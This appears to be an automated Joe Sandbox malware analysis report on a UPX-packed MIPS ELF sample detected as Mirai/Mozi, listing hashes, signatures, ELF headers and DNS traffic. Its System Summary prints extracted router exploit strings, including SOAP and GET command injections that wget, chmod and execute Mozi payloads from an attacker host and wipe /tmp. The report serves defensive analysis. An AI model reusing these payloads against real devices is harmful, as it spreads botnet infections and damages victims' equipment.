Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:bin.sh.elf
Analysis ID:1634465
MD5:e5686603e100293895b40acf911f8ce1
SHA1:ad581df4cfe56922e51ac229b6e41aed048f46c6
SHA256:8c566b50613565a5b7402e4cfc4895c672f3ca2ba69e4fe6b4798953c801f3a7
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample is packed with UPX
ELF contains segments with high entropy indicating compressed/encrypted content
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1634465
Start date and time:2025-03-11 00:07:38 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.sh.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/0@2/0
Command:/tmp/bin.sh.elf
PID:5435
Exit Code:133
Exit Code Info:
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
  • system is lnxubuntu20
  • bin.sh.elf (PID: 5435, Parent: 5358, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/bin.sh.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.sh.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    bin.sh.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      bin.sh.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        bin.sh.elfLinux_Packer_Patched_UPX_62e11c64unknownunknown
        • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
        SourceRuleDescriptionAuthorStrings
        5435.1.00007fb144400000.00007fb144422000.r-x.sdmpLinux_Packer_Patched_UPX_62e11c64unknownunknown
        • 0x78:$a: 55 50 58 21 0A 58 0D 89 00 00 00 00 00 00 00 00 00 00 00 00
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: bin.sh.elfAvira: detected
        Source: bin.sh.elfVirustotal: Detection: 63%Perma Link
        Source: bin.sh.elfReversingLabs: Detection: 57%
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.a;chmod
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.a;sh$
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m;
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m;$
        Source: bin.sh.elfString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
        Source: bin.sh.elfString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: bin.sh.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: bin.sh.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: bin.sh.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
        Source: bin.sh.elfString found in binary or memory: http://upx.sf.net

        System Summary

        barindex
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
        Source: 5435.1.00007fb144400000.00007fb144422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 Author: unknown
        Source: LOAD without section mappingsProgram segment: 0x400000
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
        Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
        Source: Initial samplePotential command found: GET /%s HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
        Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
        Source: 5435.1.00007fb144400000.00007fb144422000.r-x.sdmp, type: MEMORYMatched rule: Linux_Packer_Patched_UPX_62e11c64 reference_sample = 02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669, os = linux, severity = x86, creation_date = 2021-06-08, scan_context = file, reference = https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/, license = Elastic License v2, threat_name = Linux.Packer.Patched_UPX, fingerprint = 3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d, id = 62e11c64-fc7d-4a0a-9d72-ad53ec3987ff, last_modified = 2021-07-28
        Source: classification engineClassification label: mal92.troj.evad.linELF@0/0@2/0

        Data Obfuscation

        barindex
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
        Source: bin.sh.elfSubmission file: segment LOAD with 7.8156 entropy (max. 8.0)
        Source: /tmp/bin.sh.elf (PID: 5435)Queries kernel information via 'uname': Jump to behavior
        Source: bin.sh.elf, 5435.1.000055cc440b6000.000055cc4413d000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
        Source: bin.sh.elf, 5435.1.000055cc440b6000.000055cc4413d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: bin.sh.elf, 5435.1.00007fff26df8000.00007fff26e19000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf
        Source: bin.sh.elf, 5435.1.00007fff26df8000.00007fff26e19000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
        Source: bin.sh.elf, 5435.1.00007fff26df8000.00007fff26e19000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: bin.sh.elf, type: SAMPLE

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter
        Path InterceptionPath Interception11
        Obfuscated Files or Information
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Application Layer Protocol
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634465 Sample: bin.sh.elf Startdate: 11/03/2025 Architecture: LINUX Score: 92 8 daisy.ubuntu.com 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 2 other signatures 2->16 6 bin.sh.elf 2->6         started        signatures3 process4
        SourceDetectionScannerLabelLink
        bin.sh.elf63%VirustotalBrowse
        bin.sh.elf58%ReversingLabsLinux.Trojan.Dakkatoni
        bin.sh.elf100%AviraEXP/ELF.Agent.L.26
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        162.213.35.25
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://upx.sf.netbin.sh.elffalse
            high
            http://%s:%d/Mozi.a;sh$bin.sh.elffalse
              high
              http://%s:%d/Mozi.a;chmodbin.sh.elffalse
                high
                http://%s:%d/Mozi.m;/tmp/Mozi.mbin.sh.elffalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/bin.sh.elffalse
                    high
                    http://schemas.xmlsoap.org/soap/envelope//bin.sh.elffalse
                      high
                      http://%s:%d/Mozi.mbin.sh.elffalse
                        high
                        http://purenetworks.com/HNAP1/bin.sh.elffalse
                          high
                          http://%s:%d/Mozi.m;bin.sh.elffalse
                            high
                            http://%s:%d/Mozi.m;$bin.sh.elffalse
                              high
                              http://schemas.xmlsoap.org/soap/envelope/bin.sh.elffalse
                                high
                                No contacted IP infos
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                daisy.ubuntu.comdebug.dbg.elfGet hashmaliciousMiraiBrowse
                                • 162.213.35.24
                                boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                • 162.213.35.24
                                .i.elfGet hashmaliciousUnknownBrowse
                                • 162.213.35.24
                                sshd.elfGet hashmaliciousUnknownBrowse
                                • 162.213.35.25
                                mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                • 162.213.35.24
                                arm5.elfGet hashmaliciousMiraiBrowse
                                • 162.213.35.25
                                arm6.elfGet hashmaliciousMirai, MoobotBrowse
                                • 162.213.35.24
                                mips.elfGet hashmaliciousMirai, MoobotBrowse
                                • 162.213.35.24
                                x86.elfGet hashmaliciousMirai, MoobotBrowse
                                • 162.213.35.24
                                gif.elfGet hashmaliciousXmrigBrowse
                                • 162.213.35.24
                                No context
                                No context
                                No context
                                No created / dropped files found
                                File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                Entropy (8bit):4.955983973875587
                                TrID:
                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                File name:bin.sh.elf
                                File size:307'960 bytes
                                MD5:e5686603e100293895b40acf911f8ce1
                                SHA1:ad581df4cfe56922e51ac229b6e41aed048f46c6
                                SHA256:8c566b50613565a5b7402e4cfc4895c672f3ca2ba69e4fe6b4798953c801f3a7
                                SHA512:cd7ba8e58580270e7970335279a4eab924123d729588a1f36ef1e19258ae7bf5705d6c3a929f2994f300ca830169bd0559e5fe562e244ff8f25c3bf40fe0908f
                                SSDEEP:3072:phNlHuBafLeBtfCzpta8xlBIOdVo3/4sxLJ10xioZ3Q:p3lOYoaja8xzx/0wsxzSi5
                                TLSH:FA64028BEB21BC1FCE010FB125DB0B9D76BC965B82C79090B2D4895F35B6185B7A11C9
                                File Content Preview:.ELF.....................B.....4.........4. ...(.............@...@...........................C...C......../..........*.*UPX!.X.....................^....|.$..ELF..........@.`....4...0... ...(......<...@......[v......H...`.t..;_...dt.Q.....].M..............

                                ELF header

                                Class:ELF32
                                Data:2's complement, big endian
                                Version:1 (current)
                                Machine:MIPS R3000
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - System V
                                ABI Version:0
                                Entry Point Address:0x4206a8
                                Flags:0x1007
                                ELF Header Size:52
                                Program Header Offset:52
                                Program Header Size:32
                                Number of Program Headers:2
                                Section Header Offset:0
                                Section Header Size:40
                                Number of Section Headers:0
                                Header String Table Index:0
                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                LOAD0x00x4000000x4000000x210f20x210f27.81560x5R E0x10000
                                LOAD0x00x4300000x4300000x00x92fd80.00000x6RW 0x10000

                                Download Network PCAP: filteredfull

                                TimestampSource PortDest PortSource IPDest IP
                                Mar 11, 2025 00:08:25.395797014 CET5831553192.168.2.131.1.1.1
                                Mar 11, 2025 00:08:25.395906925 CET5988553192.168.2.131.1.1.1
                                Mar 11, 2025 00:08:25.402981043 CET53598851.1.1.1192.168.2.13
                                Mar 11, 2025 00:08:25.403137922 CET53583151.1.1.1192.168.2.13
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Mar 11, 2025 00:08:25.395797014 CET192.168.2.131.1.1.10xc297Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                Mar 11, 2025 00:08:25.395906925 CET192.168.2.131.1.1.10xb55fStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Mar 11, 2025 00:08:25.403137922 CET1.1.1.1192.168.2.130xc297No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                Mar 11, 2025 00:08:25.403137922 CET1.1.1.1192.168.2.130xc297No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                System Behavior

                                Start time (UTC):23:08:23
                                Start date (UTC):10/03/2025
                                Path:/tmp/bin.sh.elf
                                Arguments:/tmp/bin.sh.elf
                                File size:5777432 bytes
                                MD5 hash:0083f1f0e77be34ad27f849842bbb00c